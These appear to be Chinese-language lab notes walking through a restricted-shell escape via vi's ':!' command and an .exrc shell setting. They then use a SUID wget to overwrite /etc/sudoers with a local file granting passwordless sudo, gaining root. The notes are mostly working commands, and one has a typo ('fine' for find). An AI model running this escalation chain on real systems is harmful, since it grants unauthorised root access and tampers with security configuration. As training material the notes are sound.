(命令受限)查看系统环境,找到bin目录
echo $PATH
进入bin目录
cd <bin目录路径>
ls
cd ..
ls -la
查看路径下的文件信息
尝试将/bin路径加入到系统环境中,PATH变量当前用户只用读权限
PATH=/bin
当前bash无权限修改环境变量
想办法运行/bin/目录下的bash得到修改PATH环境变量的权限
利用vi / vim感叹号来执行外部shell命令
vi
<esc>:! /bin/bash
发现shell命令返回码不为0,命令执行失败
尝试切换当前shell为/bin/bash
查看.exrc文件(.exrc是vi的配置文件,相当于.vimrc是vim的配置文件)
查看.exrc文件内容
修改shell变量使其生效
vi .exrc
修改内容shell=/bin/bash
保存退出
再次利用vi 感叹号执行外部shell命令更改当前shell为/bin/bash
vi
<esc>:! /bin/bash
whoami 或其他命令也可以
whoami无法执行,但确认了shell为bash
改变PATH环境变量,添加/bin到环境变量中
查看/bin支持的命令
搜索具有Suid权限的文件
fine / -type f -perm -04000 -ls 2>/dev/null
-type 指定搜索的文件类型,这里 f 代表 file
-perm -04000 搜索出有Suid权限的文件
https://blog.csdn.net/u011616400/article/details/41212767
-ls 对输出使用长格式显示
2>/dev/null 将标准错误输出到/dev/null中
看到wget心生一计
在有写权限的地方(这里写在/tmp目录下)新建一个sudoers文件
cd /tmp
vi sudoers
# /tmp/sudoers student为用户名自行取代
student ALL=NOPASSWD:ALL
# :wq!
在当前目录下用python在8080端口启动一个http服务
一下命令均可实现
python -m SimpleHTTPServer 8080 &
python3 -m http.server 8080 &
使用wget命令将sudoers文件写到/etc目录下
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
执行sudo -l 显示当前用户有哪些权限
sudo -l
当前用户获得最高权限
